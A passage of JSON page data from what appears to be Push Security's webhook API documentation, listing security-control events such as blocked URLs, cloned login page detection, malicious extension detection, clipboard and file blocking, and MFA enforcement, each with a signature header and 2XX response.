visited","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/blocked-url-visited/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_741"}},"schemaId":"schema_741","pointer":"/paths/blocked-url-visited/post/requestBody","description":"A blocked URL was visited."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"blocked-url-visited","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_741"}},"responseCodes":["2XX"],"pointer":"blocked-url-visited","href":"controls/blocked-url-visited-event","openApiOperationId":"blocked-url-visited-event","summary":"Blocked URL visited"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_741","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_741"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/blocked-url-visited/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/blocked-url-visited-event"}],"panels":[]}]},"httpPath":"blocked-url-visited"},{"label":"Browser extension blocked or enabled","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/browser-extension-state-enforcement-event","routeSlug":"/webhooks-v1/controls/browser-extension-state-enforcement-event","metadata":{"seo":{"title":"Browser extension blocked or enabled","description":"Browser extension blocked or enabled"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"browser-extension-state-enforcement-event","name":"Browser extension blocked or enabled","isWebhook":true,"pointer":"/paths/browser-extension-state-enforcement-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Browser extension blocked or enabled","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/browser-extension-state-enforcement-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_742"}},"schemaId":"schema_742","pointer":"/paths/browser-extension-state-enforcement-event/post/requestBody","description":"A browser extension was blocked or force enabled for an employee."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"browser-extension-state-enforcement-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_742"}},"responseCodes":["2XX"],"pointer":"browser-extension-state-enforcement-event","href":"controls/browser-extension-state-enforcement-event","openApiOperationId":"browser-extension-state-enforcement-event","summary":"Browser extension blocked or enabled"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_742","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_742"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/browser-extension-state-enforcement-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/browser-extension-state-enforcement-event"}],"panels":[]}]},"httpPath":"browser-extension-state-enforcement-event"},{"label":"Clipboard blocking","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/clipboard-blocking-event","routeSlug":"/webhooks-v1/controls/clipboard-blocking-event","metadata":{"seo":{"title":"Clipboard blocking","description":"Clipboard blocking"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"clipboard-blocking-event","name":"Clipboard blocking","isWebhook":true,"pointer":"/paths/clipboard-blocking-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Clipboard blocking","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/clipboard-blocking-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_743"}},"schemaId":"schema_743","pointer":"/paths/clipboard-blocking-event/post/requestBody","description":"A clipboard event matched a configured clipboard blocking rule."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"clipboard-blocking-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_743"}},"responseCodes":["2XX"],"pointer":"clipboard-blocking-event","href":"controls/clipboard-blocking-event","openApiOperationId":"clipboard-blocking-event","summary":"Clipboard blocking"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_743","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_743"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/clipboard-blocking-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/clipboard-blocking-event"}],"panels":[]}]},"httpPath":"clipboard-blocking-event"},{"label":"Cloned login page detected","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/cloned-login-page-detected-event","routeSlug":"/webhooks-v1/controls/cloned-login-page-detected-event","metadata":{"seo":{"title":"Cloned login page detected","description":"Cloned login page detected"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"cloned-login-page-detected-event","name":"Cloned login page detected","isWebhook":true,"pointer":"/paths/cloned-login-page-detected/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Cloned login page detected","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/cloned-login-page-detected/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_744"}},"schemaId":"schema_744","pointer":"/paths/cloned-login-page-detected/post/requestBody","description":"A cloned login page detected event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"cloned-login-page-detected","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_744"}},"responseCodes":["2XX"],"pointer":"cloned-login-page-detected","href":"controls/cloned-login-page-detected-event","openApiOperationId":"cloned-login-page-detected-event","summary":"Cloned login page detected"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_744","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_744"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/cloned-login-page-detected/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/cloned-login-page-detected-event"}],"panels":[]}]},"httpPath":"cloned-login-page-detected"},{"label":"Custom detection","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/custom-detection-detected-event","routeSlug":"/webhooks-v1/controls/custom-detection-detected-event","metadata":{"seo":{"title":"Custom detection","description":"Custom detection"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"custom-detection-detected-event","name":"Custom detection","isWebhook":true,"pointer":"/paths/custom-detection-detected/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Custom detection","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/custom-detection-detected/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_745"}},"schemaId":"schema_745","pointer":"/paths/custom-detection-detected/post/requestBody","description":"A custom detection event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"custom-detection-detected","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_745"}},"responseCodes":["2XX"],"pointer":"custom-detection-detected","href":"controls/custom-detection-detected-event","openApiOperationId":"custom-detection-detected-event","summary":"Custom detection"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_745","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_745"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/custom-detection-detected/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/custom-detection-detected-event"}],"panels":[]}]},"httpPath":"custom-detection-detected"},{"label":"Domain category blocking triggered","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/domain-category-blocking-event","routeSlug":"/webhooks-v1/controls/domain-category-blocking-event","metadata":{"seo":{"title":"Domain category blocking triggered","description":"Domain category blocking triggered"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"domain-category-blocking-event","name":"Domain category blocking triggered","isWebhook":true,"pointer":"/paths/domain-category-blocking-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Domain category blocking triggered","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/domain-category-blocking-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_746"}},"schemaId":"schema_746","pointer":"/paths/domain-category-blocking-event/post/requestBody","description":"A domain category blocking rule was triggered for an employee."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"domain-category-blocking-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_746"}},"responseCodes":["2XX"],"pointer":"domain-category-blocking-event","href":"controls/domain-category-blocking-event","openApiOperationId":"domain-category-blocking-event","summary":"Domain category blocking triggered"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_746","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_746"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/domain-category-blocking-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/domain-category-blocking-event"}],"panels":[]}]},"httpPath":"domain-category-blocking-event"},{"label":"File download blocking","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/file-download-blocking-event","routeSlug":"/webhooks-v1/controls/file-download-blocking-event","metadata":{"seo":{"title":"File download blocking","description":"File download blocking"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"file-download-blocking-event","name":"File download blocking","isWebhook":true,"pointer":"/paths/file-download-blocking/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"File download blocking","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/file-download-blocking/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_747"}},"schemaId":"schema_747","pointer":"/paths/file-download-blocking/post/requestBody","description":"A file download blocking event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"file-download-blocking","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_747"}},"responseCodes":["2XX"],"pointer":"file-download-blocking","href":"controls/file-download-blocking-event","openApiOperationId":"file-download-blocking-event","summary":"File download blocking"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_747","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_747"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/file-download-blocking/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/file-download-blocking-event"}],"panels":[]}]},"httpPath":"file-download-blocking"},{"label":"File upload blocking","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/file-upload-blocking-event","routeSlug":"/webhooks-v1/controls/file-upload-blocking-event","metadata":{"seo":{"title":"File upload blocking","description":"File upload blocking"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"file-upload-blocking-event","name":"File upload blocking","isWebhook":true,"pointer":"/paths/file-upload-blocking/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"File upload blocking","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/file-upload-blocking/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_748"}},"schemaId":"schema_748","pointer":"/paths/file-upload-blocking/post/requestBody","description":"A file upload blocking event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"file-upload-blocking","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_748"}},"responseCodes":["2XX"],"pointer":"file-upload-blocking","href":"controls/file-upload-blocking-event","openApiOperationId":"file-upload-blocking-event","summary":"File upload blocking"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_748","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_748"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/file-upload-blocking/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/file-upload-blocking-event"}],"panels":[]}]},"httpPath":"file-upload-blocking"},{"label":"Malicious browser extension detected","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/malicious-browser-extension-detected-event","routeSlug":"/webhooks-v1/controls/malicious-browser-extension-detected-event","metadata":{"seo":{"title":"Malicious browser extension detected","description":"Malicious browser extension detected"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malicious-browser-extension-detected-event","name":"Malicious browser extension detected","isWebhook":true,"pointer":"/paths/malicious-browser-extension-detected-event/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malicious browser extension detected","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malicious-browser-extension-detected-event/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_749"}},"schemaId":"schema_749","pointer":"/paths/malicious-browser-extension-detected-event/post/requestBody","description":"A browser extension identified as malicious was installed, enabled, or attempted to be used by an employee."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malicious-browser-extension-detected-event","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_749"}},"responseCodes":["2XX"],"pointer":"malicious-browser-extension-detected-event","href":"controls/malicious-browser-extension-detected-event","openApiOperationId":"malicious-browser-extension-detected-event","summary":"Malicious browser extension detected"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_749","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_749"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malicious-browser-extension-detected-event/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/malicious-browser-extension-detected-event"}],"panels":[]}]},"httpPath":"malicious-browser-extension-detected-event"},{"label":"Malicious copy and paste detected","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/malicious-copy-paste-detected-event","routeSlug":"/webhooks-v1/controls/malicious-copy-paste-detected-event","metadata":{"seo":{"title":"Malicious copy and paste detected","description":"Malicious copy and paste detected"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"malicious-copy-paste-detected-event","name":"Malicious copy and paste detected","isWebhook":true,"pointer":"/paths/malicious-copy-paste-detected/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"Malicious copy and paste detected","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/malicious-copy-paste-detected/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_750"}},"schemaId":"schema_750","pointer":"/paths/malicious-copy-paste-detected/post/requestBody","description":"A malicious copy and paste detected event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"malicious-copy-paste-detected","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_750"}},"responseCodes":["2XX"],"pointer":"malicious-copy-paste-detected","href":"controls/malicious-copy-paste-detected-event","openApiOperationId":"malicious-copy-paste-detected-event","summary":"Malicious copy and paste detected"},"isWebhook":true,"hideReplay":false,"servers":[{"url":"https://api.pushsecurity.com"}],"schemaId":"schema_750","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_750"}},"examples":[]}]}]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Responses","labelTranslationKey":"responses","deepLinkSuffix":"responses"},{"nodeType":"item-content","variant":"responses","responses":[{"code":"2XX","description":"Return any 2XX status to indicate that the data was received successfully"}],"pointer":"/paths/malicious-copy-paste-detected/post/responses"}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"feedback","pageSlug":"/controls/malicious-copy-paste-detected-event"}],"panels":[]}]},"httpPath":"malicious-copy-paste-detected"},{"label":"MFA enforcement event","deprecated":false,"httpVerb":"post","isAdditionalOperation":false,"isWebhook":true,"type":"link","link":"/webhooks-v1/controls/mfa-enforcement-event","routeSlug":"/webhooks-v1/controls/mfa-enforcement-event","metadata":{"seo":{"title":"MFA enforcement event","description":"MFA enforcement event"}},"content":{"contentType":"item","itemVariant":"httpItem","meta":{"sourceId":"mfa-enforcement-event","name":"MFA enforcement event","isWebhook":true,"pointer":"/paths/mfa-enforcement/post","hasSamples":true},"children":[{"nodeType":"container","children":[{"nodeType":"header","level":2,"label":"MFA enforcement event","isWebhook":true,"showPageActions":true}],"panels":[]},{"nodeType":"container","children":[{"nodeType":"header","level":4,"label":"Request","labelTranslationKey":"request","deepLinkSuffix":"request"},{"nodeType":"security","requirements":[{"schemes":[{"name":"X-Signature","scopes":[],"type":"http","scheme":"bearer","description":"Signature verification"}]}]},{"nodeType":"item-content","variant":"headers","label":"Headers","labelTranslationKey":"header","parameters":[{"name":"X-Signature","in":"header","schemaId":"schema_624","required":true,"example":"X-Signature: t=1492774577,v1=5257a869..."}],"pointer":"/paths/mfa-enforcement/post/parameters"},{"nodeType":"item-content","variant":"body","label":"Request Body","labelTranslationKey":"body","mediaTypes":["application/json"],"mediaTypeSchemas":{"application/json":{"schemaId":"schema_751"}},"schemaId":"schema_751","pointer":"/paths/mfa-enforcement/post/requestBody","description":"An MFA enforcement event occurred."}],"panels":[{"children":[{"kind":"code-sample","source":{"kind":"code-sample","operationType":"webhook","method":"POST","path":"mfa-enforcement","servers":[{"url":"https://api.pushsecurity.com"}],"parameters":{"path":[],"query":[],"querystring":[],"header":[{"name":"X-Signature","in":"header","required":true,"example":"X-Signature: t=1492774577,v1=5257a869...","schemaId":"schema_624"}],"cookie":[]},"security":[{"schemes":[{"id":"X-Signature","type":"http","scheme":"bearer"}],"scopes":[]}],"requestBody":{"application/json":{"schemaId":"schema_751"}},"responseCodes":["2XX"],"pointer":"mfa-enforcement","href":"controls/mfa-enforcement-event","openApiOperationId":"mfa-enforcement-event","summary":"MFA enforcement 